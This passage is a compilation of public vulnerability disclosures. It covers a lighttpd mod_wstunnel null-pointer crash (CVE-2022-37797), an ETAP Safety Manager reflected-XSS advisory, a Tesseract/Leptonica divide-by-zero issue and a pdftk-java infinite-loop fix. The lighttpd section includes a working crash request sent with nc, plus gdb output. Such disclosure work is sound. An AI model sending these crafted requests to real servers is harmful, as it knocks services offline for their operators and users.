  function send\_msg() { if (++ll <= 5) { log('SEND: '+ll); ws.send(ll+'\\n'); } }
  // setup websocket with callbacks
  var ws = new WebSocket('ws://localhost:3000/ws/');
  ws.onopen = function()         { log('CONNECT\\n'); send\_msg(); };
  ws.onclose = function()        { log('DISCONNECT'); };
  ws.onmessage = function(event) { log('RECV: ' + event.data); send\_msg(); };
    </script>

/home/osboxes/server.conf:  

server.document-root = "/home/osboxes/webroot" 
server.port = 3000
mimetype.assign = (
  ".html" => "text/html",
)

server.modules += ("mod\_wstunnel")
wstunnel.server = (
  "/ws/" => (
    (
      "socket" => "/dev/shm/psock",
      "bin-path" => "/home/osboxes/echo.pl",
      "max-procs" => 1
    )
  )
)

3\. Run the server  

$ lighttpd -D -f ~/server.conf

4\. Optional - open a website in a browser to confirm that websocket configuration works  

$ firefox http://localhost:3000/ws.html

5\. Optional - send valid request  

$ echo -e "GET /ws/ HTTP/1.1\\r\\nHost: localhost\\r\\nSec-WebSocket-Version: 13\\r\\nSec-WebSocket-Extensions: permessage-deflate\\r\\nSec-WebSocket-Key: FCM5bSXLZW322otNERLYNA==\\r\\nConnection: keep-alive, Upgrade\\r\\nSec-Fetch-Dest: websocket\\r\\nSec-Fetch-Mode: websocket\\r\\nSec-Fetch-Site: same-origin\\r\\nUpgrade: websocket\\r\\n\\r\\n" | nc -v 127.0.0.1 3000
Connection to 127.0.0.1 3000 port \[tcp/\*\] succeeded!
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Sec-WebSocket-Accept: vdMhuNAtgTQZJEwrIEBtPElq0RM=
Connection: upgrade
Date: Tue, 02 Aug 2022 20:40:38 GMT
Server: lighttpd/1.4.65

6\. Send invalid request (\`Sec-WebSocket-Version: x\`) - crash the server  

$ echo -e "GET /ws/ HTTP/1.1\\r\\nHost: localhost\\r\\nSec-WebSocket-Version: x\\r\\nSec-WebSocket-Extensions: permessage-deflate\\r\\nSec-WebSocket-Key: FCM5bSXLZW322otNERLYNA==\\r\\nConnection: keep-alive, Upgrade\\r\\nSec-Fetch-Dest: websocket\\r\\nSec-Fetch-Mode: websocket\\r\\nSec-Fetch-Site: same-origin\\r\\nUpgrade: websocket\\r\\n\\r\\n" | nc -v 127.0.0.1 3000
Connection to 127.0.0.1 3000 port \[tcp/\*\] succeeded!
HTTP/1.1 400 Bad Request
Transfer-Encoding: chunked
Date: Tue, 02 Aug 2022 20:41:13 GMT
Server: lighttpd/1.4.65

$ lighttpd -D -f server.conf 
2022-08-02 16:39:44: (/home/osboxes/lighttpd-1.4.65/src/server.c.1588) server started (lighttpd/1.4.65)
    Segmentation fault (core dumped)

$ gdb --args lighttpd -D -f server.conf 
(gdb) r
Starting program: /usr/local/sbin/lighttpd -D -f server.conf
\[Thread debugging using libthread\_db enabled\]
Using host libthread\_db library "/lib/x86\_64-linux-gnu/libthread\_db.so.1".
2022-08-02 16:41:47: (/home/osboxes/lighttpd-1.4.65/src/server.c.1588) server started (lighttpd/1.4.65)

Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
(gdb) up
#1  0x000055555559d75e in gw\_write\_request (hctx=0x5555555e3fd0, r=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/gw\_backend.c:1993
1993                handler\_t rc = hctx->create\_env(hctx);
(gdb) print hctx->create\_env
$1 = (handler\_t (\*)(struct gw\_handler\_ctx \*)) 0x0
(gdb) bt
#0  0x0000000000000000 in ?? ()
#1  0x000055555559d75e in gw\_write\_request (hctx=0x5555555e3fd0, r=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/gw\_backend.c:1993
#2  0x000055555559dd27 in gw\_send\_request (hctx=0x5555555e3fd0, r=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/gw\_backend.c:2154
#3  0x000055555559e1f6 in gw\_handle\_subrequest (r=0x5555555e1230, p\_d=0x5555555db1f0) at /home/osboxes/lighttpd-1.4.65/src/gw\_backend.c:2264
#4  0x000055555556a857 in connection\_handle\_write\_state (r=0x5555555e1230, con=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/connections.c:473
#5  0x000055555556bd67 in connection\_state\_machine\_loop (r=0x5555555e1230, con=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/connections.c:1028
#6  0x000055555556c805 in connection\_state\_machine\_h1 (con=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/connections.c:1341
#7  0x000055555556c87d in connection\_state\_machine (con=0x5555555e1230) at /home/osboxes/lighttpd-1.4.65/src/connections.c:1356
#8  0x0000555555566b4c in server\_run\_con\_queue (joblist=0x5555555e1230, sentinel=0x5555555d3b60 <log\_con\_jqueue>) at /home/osboxes/lighttpd-1.4.65/src/server.c:1958
#9  0x0000555555566c95 in server\_main\_loop (srv=0x5555555d5540) at /home/osboxes/lighttpd-1.4.65/src/server.c:2011
#10 0x0000555555566e86 in main (argc=4, argv=0x7fffffffe138) at /home/osboxes/lighttpd-1.4.65/src/server.c:2085

Discovered by Michał Dardas

CVE-2022-37797: Bug #3165: mod_wstunnel null pointer dereference - Lighttpd

Input passed to the GET parameter 'action' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in context of an affected site.

Title: ETAP Safety Manager 1.0.0.32 Remote Unauthenticated Reflected XSS  
Advisory ID: ZSL-2022-5711  
Type: Local/Remote  
Impact: Cross-Site Scripting  
Risk: (4/5)  
Release Date: 11.09.2022

**Summary**

The ETAP Safety Manager (ESM) is a central managing and control system that helps you to monitor, adjust and maintain your emergency lighting system. Therefore each luminaire connected to your ESM network is given a unique code. The ESM can easily identify the luminaires individually and automatically report whether all luminaires work properly. You can either choose between a wired or wireless network, or a combination of both. With ESM you will not only manage your self contained or your centrally supplied ‘ETAP Battery System’ (EBS) emergency luminaires’, but also DALI emergency units and K9 LED modules, which you can build into your luminaires. Since your ESM system is connected to the Internet, you will always have access to it through the World Wide Web. ESMweb™ is an ‘embedded web server’ application for monitoring an emergency lighting system, which runs in the ‘ESM web controller’. The ESMweb™ application can be accessed from any PC in the corporate network or connected to the Internet - by a standard web browser.

**Description**

Input passed to the GET parameter 'action' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in context of an affected site.

**Vendor**

ETAP Lighting International NV - https://www.etaplighting.com

**Affected Version**

1.0.0.32

**Tested On**

Apache/2.4.41 (Ubuntu)

**Vendor Status**

N/A

**PoC**

etap\_xss.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[11.09.2022\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

ETAP Safety Manager 1.0.0.32 Remote Unauthenticated Reflected XSS

An issue in the Leptonica linked library (v1.79.0) in Tesseract v5.0.0 allows attackers to cause an arithmetic exception leading to a Denial of Service (DoS) via a crafted JPEG file.

****System Configuration****

*   tesseract version: 5.0.0-alpha-20210401
*   linked library version:  
    leptonica-1.79.0  
    libgif 5.1.4 : libjpeg 8d (libjpeg-turbo 2.0.3) : libpng 1.6.37 : libtiff 4.1.0 : zlib 1.2.11 : libwebp 0.6.1 : libopenjp2 2.3.1  
    Found AVX512BW  
    Found AVX512F  
    Found AVX2  
    Found AVX  
    Found FMA  
    Found SSE  
    Found OpenMP 201511  
    Found libcurl/7.68.0 GnuTLS/3.6.13 zlib/1.2.11 brotli/1.0.7 libidn2/2.2.0 libpsl/0.21.0 (+libidn2/2.2.0) libssh/0.9.3/openssl/zlib nghttp2/1.40.0 librtmp/2.3
*   Environment (Operating system, version and so on): Ubuntu 20.04.2 64bit

**Program received signal SIGFPE, Arithmetic exception.**

#0 0x00007ffff7dbe24a in pixBlockconvGray () from /lib/x86\_64-linux-gnu/liblept.so.5  
#1 0x00007ffff7dbeadd in pixBlockconv () from /lib/x86\_64-linux-gnu/liblept.so.5  
#2 0x00005555556b2d9b in tesseract::TextlineProjection::ConstructProjection (this=0x55555586e230, input\_block=input\_block@entry=0x55555587e110, rotation=..., nontext\_map=...) at ./src/ccstruct/image.h:34  
#3 0x00005555556980a7 in tesseract::StrokeWidth::GradeBlobsIntoPartitions (this=0x55555586ac20, pageseg\_mode=pageseg\_mode@entry=tesseract::PSM\_AUTO, rerotation=..., block=block@entry=0x55555587e110, nontext\_pix=...,  
denorm=, cjk\_script=0x0, projection=0x55555586e230, diacritic\_blobs=0x7fffffffd018, part\_grid=0x55555586e1d8, big\_parts=0x55555586e208) at src/textord/strokewidth.cpp:371  
#4 0x000055555566b4e5 in tesseract::ColumnFinder::FindBlocks (this=this@entry=0x55555586e0a0, pageseg\_mode=pageseg\_mode@entry=tesseract::PSM\_AUTO, scaled\_color=..., scaled\_factor=,  
input\_block=input\_block@entry=0x55555587e110, photo\_mask\_pix=..., thresholds\_pix=..., grey\_pix=..., pixa\_debug=0x7ffff624cbd0, blocks=0x7fffffffcf78, diacritic\_blobs=0x7fffffffd018, to\_blocks=0x7fffffffd020)  
at src/textord/colfind.cpp:295  
#5 0x00005555555b1c8f in tesseract::Tesseract::AutoPageSeg (this=0x7ffff6229010, pageseg\_mode=tesseract::PSM\_AUTO, blocks=0x555556f3f830, to\_blocks=0x7fffffffd020, diacritic\_blobs=0x7fffffffd018, osd\_tess=,  
osr=0x7fffffffd3d0) at src/ccmain/pagesegmain.cpp:226  
#6 0x00005555555b214d in tesseract::Tesseract::SegmentPage (this=0x7ffff6229010, input\_file=, blocks=0x555556f3f830, osd\_tess=osd\_tess@entry=0x0, osr=osr@entry=0x7fffffffd3d0) at ./src/ccutil/params.h:202  
#7 0x0000555555580e17 in tesseract::TessBaseAPI::FindLines (this=0x7fffffffe100) at /usr/include/c++/9/bits/basic\_string.h:2300  
#8 0x0000555555583608 in tesseract::TessBaseAPI::Recognize (this=0x7fffffffe100, monitor=0x0) at src/api/baseapi.cpp:838  
#9 0x0000555555583c0a in tesseract::TessBaseAPI::ProcessPage (this=this@entry=0x7fffffffe100, pix=0x55555587a110, page\_index=page\_index@entry=0x0,  
filename=filename@entry=0x7fffffffe77a "/home/ubuntu/Aws-Results/orcheFuzz-newbug/output\_tesseract\_of/initial\_crashes/2021-05-06-03:01:41\_0x7b7d0fd6\_0xb1c1261c", retry\_config=retry\_config@entry=0x0,  
timeout\_millisec=timeout\_millisec@entry=0x0, renderer=0x55555586e710) at src/api/baseapi.cpp:1259  
#10 0x0000555555584888 in tesseract::TessBaseAPI::ProcessPagesInternal (this=0x7fffffffe100, filename=, retry\_config=0x0, timeout\_millisec=0x0, renderer=0x55555586e710) at /usr/include/c++/9/bits/basic\_string.h:2300  
#11 0x0000555555584e33 in tesseract::TessBaseAPI::ProcessPages (this=0x7fffffffe100, filename=, retry\_config=, timeout\_millisec=, renderer=) at src/api/baseapi.cpp:1071  
#12 0x0000555555575ba5 in main (argc=argc@entry=0x3, argv=argv@entry=0x7fffffffe528) at /usr/include/c++/9/bits/unique\_ptr.h:360  
#13 0x00007ffff771f0b3 in \_\_libc\_start\_main (main=0x555555574ee0 <main(int, char\*\*)>, argc=0x3, argv=0x7fffffffe528, init=, fini=, rtld\_fini=, stack\_end=0x7fffffffe518)  
at ../csu/libc-start.c:308  
#14 0x000055555557d1be in \_start () at /usr/include/x86\_64-linux-gnu/bits/stdio2.h:100

I've attached the file. Please download and check the file.  
2021-05-06-03\_01\_41\_0x7b7d0fd6\_0xb1c1261c.zip

CVE-2022-38266: While processing, division by zero causes an arithmetic exception · Issue #3498 · tesseract-ocr/tesseract

PDF Labs pdftk-java v3.2.3 was discovered to contain an infinite loop via the component /text/pdf/PdfReader.java.

Merged requested to merge taewookim7646/pdftk:bug-fix into master Jul 29, 2021

**System environment**

*   Ubuntu 16.04 LTS
*   openjdk version "11.0.11" 2021-04-20
*   OpenJDK Runtime Environment (build 11.0.11+9-Ubuntu-0ubuntu2.18.04)
*   OpenJDK 64-Bit Server VM (build 11.0.11+9-Ubuntu-0ubuntu2.18.04, mixed mode)
*   Gradle 7.0.1
*   pdftk version 71fb58a8

**Execution (crafted file pdftk\_PoC.zipzip)**

$ ./pdftk-2.02-dist/pdftk/**pdftk** ./CVE-2007-0103\_AcrobatReader output tmpf/tmp

*   the input file is retrieved from CVE-2007-0103 PoC file. I also included another file partially mutated from the PoC file.

An infinite loop occurs due to the object id pointing to itself. It occurs due to the kid object pointing parent object id.

I've developed a patch code.

Please check and confirm the patch code.

Edited Jul 29, 2021 by Taewoo Kim

CVE-2021-37819: bug fix: infinite loop caused by pdf object of a kid pointing to kid's parent (!21) · Merge requests · pdftk-java / pdftk-java · GitLab

Tag

#ubuntu